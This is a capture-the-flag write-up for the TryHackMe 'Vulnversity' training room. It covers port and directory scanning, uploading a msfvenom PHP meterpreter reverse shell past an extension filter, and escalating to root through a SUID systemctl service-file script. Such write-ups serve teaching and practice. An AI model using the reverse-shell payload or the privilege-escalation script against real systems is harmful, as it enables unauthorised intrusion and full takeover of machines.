TryHackMe - Vulnversity
The room link can be found at TryHackMe - Vulnversity
Reconnaissance
Nmap
First, we do a simple Nmap scan
nmap $IP
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3128/tcp open squid-http
3333/tcp open dec-notes
We find six ports open, we can now make a more in-depth scan with nmap -sC -sV $IP. It will found
the service type and version.
nmap -sC -sV $IP
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a:4f:fc:b8:c8:76:1c:b5:85:1c:ac:b2:86:41:1c:5a (RSA)
| 256 ac:9d:ec:44:61:0c:28:85:00:88:e9:68:e9:d0:cb:3d (ECDSA)
|_ 256 30:50:cb:70:5a:86:57:22:cb:52:d9:36:34:dc:a5:58 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Vuln University
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: 0s
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2020-09-02T14:44:45-04:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-09-02T18:44:46
|_ start_date: N/A
From the OpenSSH version we can find out that the os type is Ubuntu Linux.
Gobuster
There is an HTTP port open on 3333 so we can start enumerating it.
gobuster dir -w GitHub/SecLists/Discovery/Web-Content/big.txt -u http://10.10.232.204:3333/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.232.204:3333/
[+] Threads: 10
[+] Wordlist: GitHub/SecLists/Discovery/Web-Content/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/02 20:52:40 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/internal (Status: 301)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/02 20:56:58 Finished
===============================================================
We can see various pages. Visiting them we find that on /internal there is an upload form.
If we run gobuster again on this path we can find a second directory /internal/uploads/.
Exploitation
Compromise the webserver
We start by generating our reverse shell. I chose to use a meterpreter reverse shell.
msfvenom --payload php/meterpreter/reverse_tcp LHOST=$USER_IP LPORT=$PORT > payload.php
Let’s also start the Metasploit console with an exploit/multi/handler.
Unfortunately if we try to upload it the extension is blocked. If we try the extensions provided in
the image from the challenge, we find that one works. We can find the uploaded file in the
/internal/uploads/ directory that we found before.
We now have a shell on the box.
Now we background the session and use the post/linux/gather/enum_system to enumerate the system
information, including the user accounts. With the loot command, we can list the gathered items,
and at the end of there user list, we have the bill user. In his home directory, we can find the
user flag which is readable by www-data (our user).
Privilege escalation
To gather more information about the box, we can use the upload command to upload the
linPEAS
script. This will list all the interesting information on the box, including the SUID binaries. Une
of them sticks out, the systemctl executable that bad since we can execute and change the state of
all the services on the machine without root privilege. We look up
systemctl | GTFOBins to find an easy way to
exploit it.
#!/bin/sh
TF=$(mktemp).service
echo '[Service]
Type=oneshot
ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output"
[Install]
WantedBy=multi-user.target' > $TF
systemctl link $TF
systemctl enable --now $TF
This script will create a temp service file, link, enable, and run it. The service will be run as root and will cat the flag into the tmp directory that is readable for us. We could also run a meterpreter reverse shell to gain a root shell on the box.